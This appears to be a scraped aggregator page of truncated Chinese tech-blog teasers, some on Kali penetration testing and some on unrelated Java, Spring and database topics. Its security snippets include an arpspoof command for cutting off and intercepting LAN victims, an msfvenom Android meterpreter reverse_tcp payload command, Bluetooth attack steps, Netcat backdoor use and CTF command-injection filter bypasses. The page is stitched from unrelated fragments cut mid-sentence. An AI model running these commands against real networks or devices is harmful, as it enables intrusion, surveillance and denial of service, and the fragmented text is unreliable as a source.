- Vulnhub靶机渗透-DC6
山风,
靶机渗透网络安全linux服务器
文章目录信息收集渗透信息收集arp-scan└─$sudoarp-scan-l[sudo]passwordforkali:Interface:wlan0,type:EN10MB,MAC:30:03:c8:49:52:4d,IPv4:192.168.9.22Startingarp-scan1.10.0with256hosts(https://github.com/royhills/arp-scan)
- 每周一个网络安全相关工具——MetaSpLoit
w2361734601
web安全安全msf6MetaSpLoit
一、Metasploit简介Metasploit(MSF)是一款开源渗透测试框架,集成了漏洞利用、Payload生成、后渗透模块等功能,支持多种操作系统和硬件平台。其模块化设计(如exploits、auxiliary、payloads等)使其成为全球最受欢迎的渗透测试工具之一二、安装与更新KaliLinux默认集成Kali系统自带Metasploit,通过命令msfconsole启动。若需手动安装
- 简单攻击笔记
Leon_Amos
安全
局域网断网攻击使用ArpspoofArpspoof-i网卡-t目标IP网关例如kali:网卡eth0目标ip:192.168.1.100网关:192.168.1.1那么就是arpspoof-ieth0-t192.168.1.100192.168.1.1局域网获取他人图片首先进行IP流量转发echo1>/proc/sys/net/ipv4/ip_forward意思让别人通过我们的网卡上网然后使用ar
- WSL2安装Kali Linux超级新手指南
m0_53579570
kalilinuxwindows10渗透测试网络安全系统安装
1、下载发行版手动下载适用于Linux的Windows子系统发行版包(如果MicrosoftStore可以使用也可直接在商店搜索KaliLinux下载)https://docs.microsoft.com/zh-cn/windows/wsl/install-manual2、安装发行版https://docs.microsoft.com/zh-cn/windows/wsl/install-win10
- kali安装教程(超全)
撒旦骑路西法,大战吕布
linux服务器运维
KaliLinux是一款基于Debian的Linux发行版,专注于渗透测试和安全审计。以下是在计算机上安装KaliLinux的步骤:1.下载KaliLinux的ISO镜像文件。你可以从官方网站(https://www.kali.org/downloads/)或者其他可靠的镜像站点下载。2.创建一个可启动的USB设备。你可以使用Rufus(https://rufus.ie/)或Etcher(http
- Kali Linux渗透基础知识整理(四):维持访问
陆小马
黑客网络安全黑客安全网络攻防
在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。维持访问是一种艺术形式,思想比渗透更加重要。NetcatCryptcatweevelycymothoaNetcatNetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(networkconnection)。它被设计成一个可靠的后端(back-end)工具,能被
- kali连接蓝牙_蓝牙攻击指南(kali)
weixin_39805924
kali连接蓝牙
基本操作hciconfig查看蓝牙设备信息hcitool:这是一个查询工具。可以用来查询设备名称,设备ID,设备类别和设备时钟。hcidump:可以使用这个来嗅探蓝牙通信hciconfighci0up启动蓝牙设备hciconfighci0down关闭蓝牙设备servicebluetoothstart启动蓝牙服务bluetoothctl蓝牙控制台错误Failedtopair:org.bluez.Er
- WSL2上下载安装ns3.43教程
李小夭
linux开源软件经验分享
介绍WindowsSubsystemforLinux(简称WSL),这是一个可以让你的电脑不用安装虚拟机,便可以运行Linux系统的平台,WSL2不仅支持Ubuntu,还支持多种其他Linux发行版。以下是一些常见的发行版:DebianKaliLinuxopenSUSELeapopenSUSETumbleweedSUSELinuxEnterpriseServer(SLES)FedoraRemixf
- ZCC66099 低功耗升压芯片替代sgm66099
HPT_Lt
嵌入式硬件
GENERALDESCRIPTIONTheZCC66099isasynchronousstep-upconverterwith0.65μAultralowquiescentcurrent.Itisdesignedforproductspoweredbyalkalinebattery,NiMHrechargeablebattery,Li-MnbatteryorrechargeableLi-lonba
- 关于MSF手机渗透木马制作
嗨起飞了
网络安全网络攻击模型网络安全
基于Metasploit的Android渗透测试防御指南⚠️法律声明本文所有技术内容仅用于安全研究,严禁非法使用!测试需获得合法授权。一、环境搭建#Kali基础环境sudoaptupdate&&sudoaptinstall-ymetasploit-frameworkapktool二、载荷生成msfvenom-pandroid/meterpreter/reverse_tcp\LHOST=your_v
- Kali Linux信息收集工具全集
weixin_30359021
001:0trace、tcptraceroute、traceroute描述:进行路径枚举时,传统基于ICMP协议的探测工具经常会受到屏蔽,造成探测结果不够全面的问题。与此相对基于TCP协议的探测,则成功率会有所提高,同时基于已经建立的合法TCP会话的探测则更具优势,甚至可以探测到目标内网。虽然没有银弹,但结合多种技术手段,则可以收集更加完整的目标信息,为后续渗透测试做准备。002:Acccheck
- 最新kali之ike-scan
Vanony
kalitop13中文手册linuxdebian安全经验分享
描述: 发现和指纹IKE主机(IPsecVPN服务器)。 ike-scan可以发现IKE主机,也可以使用重传退避模式对它们进行指纹识别。 ike-scan做两件事: 发现:确定哪些主机正在运行IKE。通过显示那些响应ike-scan发送的IKE请求的主机来完成此操作。 指纹识别:确定主机使用的是哪种IKE实现。有几种方法可以做到这一点: (a)退避指纹识别-记录来自目标
- Kali Linux信息收集工具
dechen6073
http://www.freebuf.com/column/150118.html可能大部分渗透测试者都想成为网络空间的007,而我个人的目标却是成为Q先生!看过007系列电影的朋友,应该都还记得那个戏份不多但一直都在的Q先生(由于年级太长目前已经退休)。他为007发明了众多神奇的武器,并且总能在关键时刻挽救大英雄于危难之间。但是与Q先生相比我很惭愧。因为到目前为止我还没有发明出什么可以与他相比的
- VMware安装Kali(虚拟机压缩包)&设置Windbg调试符号
wave_sky
linux运维服务器
下载完成后会得到一个.7z的压缩包:kali-linux-2024.2-vmware-amd64.7z,需要对其进行解压自己找个地方创建一个文件夹(虚拟机目录),将kali-linux-2024.2-vmware-amd64.vmwarevm整个文件夹放进去打开VMware虚拟机:文件->打开,找到kali-linux-2024.2-vmware-amd64.vmwarevm文件夹,选择的文件是.
- 【spring-kafka】@KafkaListener详解与使用
2401_84408092
程序员springkafkalinq
id监听器的id①.消费者线程命名规则填写:2020-11-1914:24:15c.d.b.k.KafkaListeners120[INFO]线程:Thread[consumer-id5-1-C-1,5,main]-groupId:BASE-DEMOconsumer-id5消费没有填写ID:2020-11-1910:41:26c.d.b.k.KafkaListeners137[INFO]线程:Th
- Metasploit Framework(MSF)全面使用手册
阿贾克斯的黎明
网络安全网络安全
目录MetasploitFramework(MSF)全面使用手册引言一、安装MetasploitFramework1.1在KaliLinux上安装1.2在其他Linux系统上安装1.3在Windows上安装二、启动MetasploitFramework三、基本操作3.1查看帮助信息3.2搜索模块3.3使用模块3.4查看模块选项3.5设置模块选项3.6执行模块四、常见模块类型及使用示例4.1漏洞利用
- 渗透利器-kali工具 (第二章-4) 信息收集之目录扫描 - dirbuster
网络安全指导员
网络安全程序员黑客linux运维服务器安全web安全
一:目录扫描的作用1.文件目录:文件目录是指:为实现"按名称存取",必须建立文件名与辅存空间中物理地址的对应关系,体现这种对应关系的数据结构称为文件目录。2.目录扫描:目录扫描可以让我们发现这个网站存在多少个目录,多少个页面,搜索出网站到的整体结构。通过目录扫描我们还能扫敏感文件、后台文件、数据库文件、信息泄露文件等等。3.信息收集的重要部分。二:常见的目录信息泄露1.目录遍历漏洞:目录遍历[路径
- 网络渗透测试实验四:CTF实践
肆——
渗透作业网络
1.实验目的和要求实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTPweb服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。系统环境:KaliLinux2、WebDeveloper靶机来源:https://www.vulnhub.co
- Kali系统:渗透测试与安全审计的利器
伟大无须多言
网络安全
Kali系统:渗透测试与安全审计的利器引言:Kali系统——黑客与安全专家的首选平台在网络安全领域,Kali系统以其强大的功能和丰富的工具集,成为了渗透测试和安全审计的首选平台。从最初的BackTrack发展到如今的Kali,这一基于Debian的Linux发行版,不仅继承了Linux系统的稳定性和安全性,还集成了大量专业的安全工具,为网络安全专业人士提供了强大的支持。本文将详细介绍Kali系统的
- ctf命令执行漏洞绕过方式小结
_小飒
ctf学习
测试环境:本地:Win10phpstudy8.1kali2020.2外网:单位提供的linux靶机一、命令分隔符%0a–换行符,%0d–回车符,;–连续指令&&–|–||–二、空格%09$IFS$9${IFS}三、读文件(1)more:一页一页的显示档案内容(2)less:与more类似,但是比more更好的是,他可以[pgdn][pgup]翻页(3)head:查看头几行(4)tac:从最后一行开
- Kafka 之事务消息
码农爱java
KafkaKafkaMQ消息中间件事务消息微服务SpringBoot
前言:在分布式消息系统中,事务消息也是一个热门课题,在项目的实际业务场景中,如果用到事务消息的场景也不少见,那Kafka作为一个高性能的分布式消息中间件,同样也支持事务消息,本篇我们将对Kafka的事务消息展开讨论。Kafka系列文章传送门Kafka简介及核心概念讲解SpringBoot整合Kafka详解Kafka@KafkaListener注解的详解及使用Kafka客户端工具使用分享【offse
- Python实现TCP通讯
JFLEARN
pythontcp/ip网络开发语言网络协议
EnvironmentClient:WindowsServer:KaLiLinux(VM_virtul)Network:SameLANClient#!/usr/bin/python3#-*-coding:utf-8-*-#@Time:2021/3/2623:22#@Author:HUGBOY#@File:TCPClient.py.py#@Software:PyCharmimportsocketcl
- 分享2025年黑客最常用的10款软件工具(包含编程密码破译漏洞扫描等),学会它你也可以成为黑客高手!
程序员晓晓
web安全黑客技术网络安全渗透测试内网渗透计算机工具分享
前言以下所有这些工具都是捆绑在一起的Linux发行版,如KaliLinux或BackBox,建议安装一个合适的Linux黑客系统,尤其是因为这些黑客工具可以(自动)更新。1、Metasploit(渗透测试软件,免费与付费)漏洞利用工具MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、
- 【裸机装机系列】17.kali(ubuntu)-linux连接蓝牙键盘
读书,代码与猫
裸机装机系列linuxubuntulinux连接蓝牙ubuntu连接蓝牙ubuntu连接蓝牙键盘linux连接蓝牙键盘kali连接蓝牙键盘
推荐阅读:1.kali(ubuntu)-为什么弃用ubuntu,而选择基于debian的kali操作系统电脑作为生产力工具,键盘是必不可少的。而大部分的自带键盘可能使用起来没那么舒服,这时候就需要外置键盘来协作。现在很多人都用蓝牙键盘了。我自己是有“有线键盘”和“蓝牙键盘”两种,这里介绍一下蓝牙键盘怎么连接linux——以我的罗技k380为例1>在键盘上进行操作(罗技k380,其他键盘可以忽略)如
- 渗透测试之信息收集(一)
@@ssyy
网络网络安全web安全
收集域名信息Whois查询Whois是一个用于查询域名注册信息、IP地址分配以及自治系统号码(ASN)等相关信息的协议和工具。在Kali系统中,Whois已经默认安装、只需要输入root@kali:etc/ssh#whoisxxx.com在线查询网站有,爱站工具网(https://whois.aizhan.com)、站长之家(http://whois.chianz.com)等,通过这些网站可以查询
- 【友好篇】从零开始:了解CMD与WSL命令行,认识Linux与虚拟机技术
泪不是Web妳而流
Web安全从0到1linuxbash
文章目录前言一、概念1、CMD的介绍2、Linux的介绍3、WSL的介绍二、简单使用1.CMD(1)打开命令行(2)cmd命令2.WSL三、总结1、虚拟机(VirtualMachine)2、kaliLinux前言你是否曾经对那些在命令行中自如操作的人感到敬佩,甚至好奇他们是如何轻松应对看似复杂的任务?你是否曾想过,自己也能掌握这项强大的技能,提升工作效率,甚至探索全新的技术领域?命令行不仅是程序员
- KALI-sqlmap更新
Warnex
web安全
在看到我kali提示自带的sqlmap版本过低,需要更新时,如下解决方案sqlmap--update或者pythonsqlmap.py--update提示你已经更新到最新版本,然后就可以正常使用了
- ARC碱金属Rydberg状态计算器软件包-2.0.1
夏勇兴
本文还有配套的精品资源,点击获取简介:此标题"ARC_Alkali_Rydberg_Calculator-2.0.1-cp27-macosx_10_6_x86_64.whl"为一个特定版本的PythonWheel软件包,旨在计算碱金属原子的Rydberg状态。适用于Python2.7版本,专为macOS10.6(SnowLeopard)64位架构设计。Rydberg状态是原子物理学中的一个重要概念
- 浅谈人群扩展(lookalike)模型
eso1983
算法
Lookalike主要用于广告或者推荐系统中,找到与种子用户相似的人群。常用的算法应该包括协同过滤、基于标签的相似度计算,还有一些机器学习模型,比如逻辑回归、随机森林,以及深度学习的模型,比如DNN或者Embedding方法。这里简单介绍一下Lookalike人群扩展(相似人群扩展)中常用算法模型的解析,涵盖原理、数学公式、实现步骤、优缺点及适用场景。1.基于标签的相似度匹配原理通过用户标签(兴趣
- 【超详细】深入解析Kali Linux:常见指令大全,助你成为安全专家
wit_@
chrome前端linuxkail网络安全
深入解析KaliLinux:常见指令大全,助你成为安全专家KaliLinux是网络安全领域最受欢迎的操作系统之一,专为渗透测试、数字取证和网络安全研究而设计。无论你是网络安全新手,还是经验丰富的安全专家,掌握KaliLinux的常见指令都是必不可少的。本文将详细介绍KaliLinux中的一些常见指令,帮助你更好地利用这个强大的工具。1.基本系统指令1.1apt-get包管理KaliLinux基于D
- jquery实现的jsonp掉java后台
知了ing
javajsonpjquery
什么是JSONP?
先说说JSONP是怎么产生的:
其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里,对于很多刚接触的人来讲理解起来有些困难,小可不才,试着用自己的方式来阐释一下这个问题,看看是否有帮助。
1、一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准;
2、
- Struts2学习笔记
caoyong
struts2
SSH : Spring + Struts2 + Hibernate
三层架构(表示层,业务逻辑层,数据访问层) MVC模式 (Model View Controller)
分层原则:单向依赖,接口耦合
1、Struts2 = Struts + Webwork
2、搭建struts2开发环境
a>、到www.apac
- SpringMVC学习之后台往前台传值方法
满城风雨近重阳
springMVC
springMVC控制器往前台传值的方法有以下几种:
1.ModelAndView
通过往ModelAndView中存放viewName:目标地址和attribute参数来实现传参:
ModelAndView mv=new ModelAndView();
mv.setViewName="success
- WebService存在的必要性?
一炮送你回车库
webservice
做Java的经常在选择Webservice框架上徘徊很久,Axis Xfire Axis2 CXF ,他们只有一个功能,发布HTTP服务然后用XML做数据传输。
是的,他们就做了两个功能,发布一个http服务让客户端或者浏览器连接,接收xml参数并发送xml结果。
当在不同的平台间传输数据时,就需要一个都能解析的数据格式。
但是为什么要使用xml呢?不能使json或者其他通用数据
- js年份下拉框
3213213333332132
java web ee
<div id="divValue">test...</div>测试
//年份
<select id="year"></select>
<script type="text/javascript">
window.onload =
- 简单链式调用的实现技术
归来朝歌
方法调用链式反应编程思想
在编程中,我们可以经常遇到这样一种场景:一个实例不断调用它自身的方法,像一条链条一样进行调用
这样的调用你可能在Ajax中,在页面中添加标签:
$("<p>").append($("<span>").text(list[i].name)).appendTo("#result");
也可能在HQ
- JAVA调用.net 发布的webservice 接口
darkranger
webservice
/**
* @Title: callInvoke
* @Description: TODO(调用接口公共方法)
* @param @param url 地址
* @param @param method 方法
* @param @param pama 参数
* @param @return
* @param @throws BusinessException
- Javascript模糊查找 | 第一章 循环不能不重视。
aijuans
Way
最近受我的朋友委托用js+HTML做一个像手册一样的程序,里面要有可展开的大纲,模糊查找等功能。我这个人说实在的懒,本来是不愿意的,但想起了父亲以前教我要给朋友搞好关系,再加上这也可以巩固自己的js技术,于是就开始开发这个程序,没想到却出了点小问题,我做的查找只能绝对查找。具体的js代码如下:
function search(){
var arr=new Array("my
- 狼和羊,该怎么抉择
atongyeye
工作
狼和羊,该怎么抉择
在做一个链家的小项目,只有我和另外一个同事两个人负责,各负责一部分接口,我的接口写完,并全部测联调试通过。所以工作就剩下一下细枝末节的,工作就轻松很多。每天会帮另一个同事测试一些功能点,协助他完成一些业务型不强的工作。
今天早上到公司没多久,领导就在QQ上给我发信息,让我多协助同事测试,让我积极主动些,有点责任心等等,我听了这话,心里面立马凉半截,首先一个领导轻易说
- 读取android系统的联系人拨号
百合不是茶
androidsqlite数据库内容提供者系统服务的使用
联系人的姓名和号码是保存在不同的表中,不要一下子把号码查询来,我开始就是把姓名和电话同时查询出来的,导致系统非常的慢
关键代码:
1, 使用javabean操作存储读取到的数据
package com.example.bean;
/**
*
* @author Admini
- ORACLE自定义异常
bijian1013
数据库自定义异常
实例:
CREATE OR REPLACE PROCEDURE test_Exception
(
ParameterA IN varchar2,
ParameterB IN varchar2,
ErrorCode OUT varchar2 --返回值,错误编码
)
AS
/*以下是一些变量的定义*/
V1 NUMBER;
V2 nvarc
- 查看端号使用情况
征客丶
windows
一、查看端口
在windows命令行窗口下执行:
>netstat -aon|findstr "8080"
显示结果:
TCP 127.0.0.1:80 0.0.0.0:0 &
- 【Spark二十】运行Spark Streaming的NetworkWordCount实例
bit1129
wordcount
Spark Streaming简介
NetworkWordCount代码
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
- Struts2 与 SpringMVC的比较
BlueSkator
struts2spring mvc
1. 机制:spring mvc的入口是servlet,而struts2是filter,这样就导致了二者的机制不同。 2. 性能:spring会稍微比struts快。spring mvc是基于方法的设计,而sturts是基于类,每次发一次请求都会实例一个action,每个action都会被注入属性,而spring基于方法,粒度更细,但要小心把握像在servlet控制数据一样。spring
- Hibernate在更新时,是可以不用session的update方法的(转帖)
BreakingBad
Hibernateupdate
地址:http://blog.csdn.net/plpblue/article/details/9304459
public void synDevNameWithItil()
{Session session = null;Transaction tr = null;try{session = HibernateUtil.getSession();tr = session.beginTran
- 读《研磨设计模式》-代码笔记-观察者模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
import java.util.ArrayList;
import java.util.List;
import java.util.Observable;
import java.util.Observer;
/**
* “观
- 重置MySQL密码
chenhbc
mysql重置密码忘记密码
如果你也像我这么健忘,把MySQL的密码搞忘记了,经过下面几个步骤就可以重置了(以Windows为例,Linux/Unix类似):
1、关闭MySQL服务
2、打开CMD,进入MySQL安装目录的bin目录下,以跳过权限检查的方式启动MySQL
mysqld --skip-grant-tables
3、新开一个CMD窗口,进入MySQL
mysql -uroot
 
- 再谈系统论,控制论和信息论
comsci
设计模式生物能源企业应用领域模型
再谈系统论,控制论和信息论
偶然看
- oracle moving window size与 AWR retention period关系
daizj
oracle
转自: http://tomszrp.itpub.net/post/11835/494147
晚上在做11gR1的一个awrrpt报告时,顺便想调整一下AWR snapshot的保留时间,结果遇到了ORA-13541这样的错误.下面是这个问题的发生和解决过程.
SQL> select * from v$version;
BANNER
-------------------
- Python版B树
dieslrae
python
话说以前的树都用java写的,最近发现python有点生疏了,于是用python写了个B树实现,B树在索引领域用得还是蛮多了,如果没记错mysql的默认索引好像就是B树...
首先是数据实体对象,很简单,只存放key,value
class Entity(object):
'''数据实体'''
def __init__(self,key,value)
- C语言冒泡排序
dcj3sjt126com
算法
代码示例:
# include <stdio.h>
//冒泡排序
void sort(int * a, int len)
{
int i, j, t;
for (i=0; i<len-1; i++)
{
for (j=0; j<len-1-i; j++)
{
if (a[j] > a[j+1]) // >表示升序
- 自定义导航栏样式
dcj3sjt126com
自定义
-(void)setupAppAppearance
{
[[UILabel appearance] setFont:[UIFont fontWithName:@"FZLTHK—GBK1-0" size:20]];
[UIButton appearance].titleLabel.font =[UIFont fontWithName:@"FZLTH
- 11.性能优化-优化-JVM参数总结
frank1234
jvm参数性能优化
1.堆
-Xms --初始堆大小
-Xmx --最大堆大小
-Xmn --新生代大小
-Xss --线程栈大小
-XX:PermSize --永久代初始大小
-XX:MaxPermSize --永久代最大值
-XX:SurvivorRatio --新生代和suvivor比例,默认为8
-XX:TargetSurvivorRatio --survivor可使用
- nginx日志分割 for linux
HarborChung
nginxlinux脚本
nginx日志分割 for linux 默认情况下,nginx是不分割访问日志的,久而久之,网站的日志文件将会越来越大,占用空间不说,如果有问题要查看网站的日志的话,庞大的文件也将很难打开,于是便有了下面的脚本 使用方法,先将以下脚本保存为 cutlog.sh,放在/root 目录下,然后给予此脚本执行的权限
复制代码代码如下:
chmo
- Spring4新特性——泛型限定式依赖注入
jinnianshilongnian
springspring4泛型式依赖注入
Spring4新特性——泛型限定式依赖注入
Spring4新特性——核心容器的其他改进
Spring4新特性——Web开发的增强
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC
Spring4新特性——Groovy Bean定义DSL
Spring4新特性——更好的Java泛型操作API
Spring4新
- centOS安装GCC和G++
liuxihope
centosgcc
Centos支持yum安装,安装软件一般格式为yum install .......,注意安装时要先成为root用户。
按照这个思路,我想安装过程如下:
安装gcc:yum install gcc
安装g++: yum install g++
实际操作过程发现,只能有gcc安装成功,而g++安装失败,提示g++ command not found。上网查了一下,正确安装应该
- 第13章 Ajax进阶(上)
onestopweb
Ajax
index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
- How to determine BusinessObjects service pack and fix pack
blueoxygen
BO
http://bukhantsov.org/2011/08/how-to-determine-businessobjects-service-pack-and-fix-pack/
The table below is helpful. Reference
BOE XI 3.x
12.0.0.
y BOE XI 3.0 12.0.
x.
y BO
- Oracle里的自增字段设置
tomcat_oracle
oracle
大家都知道吧,这很坑,尤其是用惯了mysql里的自增字段设置,结果oracle里面没有的。oh,no 我用的是12c版本的,它有一个新特性,可以这样设置自增序列,在创建表是,把id设置为自增序列
create table t
(
id number generated by default as identity (start with 1 increment b
- Spring Security(01)——初体验
yang_winnie
springSecurity
Spring Security(01)——初体验
博客分类: spring Security
Spring Security入门安全认证
首先我们为Spring Security专门建立一个Spring的配置文件,该文件就专门用来作为Spring Security的配置